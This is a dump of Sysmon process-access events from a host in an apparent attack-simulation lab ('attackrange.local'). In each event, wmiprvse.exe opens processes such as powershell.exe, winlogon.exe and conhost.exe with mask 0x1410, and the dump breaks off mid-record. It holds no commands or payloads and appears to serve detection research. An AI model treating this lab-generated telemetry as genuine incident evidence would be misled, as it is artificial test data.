15:59:38.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026597Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026596Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026595Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026594Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026593Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026592Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026591Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026590Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026589Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026588Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026587Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026586Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026585Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026584Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026583Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026582Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026581Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026580Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026579Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026578Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program 